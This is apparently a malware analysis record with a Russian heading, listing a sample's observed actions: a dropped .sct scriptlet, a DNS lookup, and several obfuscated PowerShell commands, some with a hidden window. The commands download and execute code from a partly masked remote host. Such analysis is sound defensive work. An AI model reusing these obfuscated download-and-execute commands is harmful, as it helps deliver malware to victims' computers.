Техническая информация
- '<SYSTEM32>\cmd.exe' /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient)."DownLoadString"('http://gi##OX.jp/mail.jsp?us#################
- %TEMP%\7ufndwh1x5opdy1.sct
- DNS ASK gi##ox.jp
- '<SYSTEM32>\cmd.exe' /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient)."DownLoadString"('http://gi##OX.jp/mail.jsp?us#################' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' IE`x(Ne`w-Obj`ect Net.WebC`lient)."DownLoadString"('http://gi##OX.jp/mail.jsp?us#################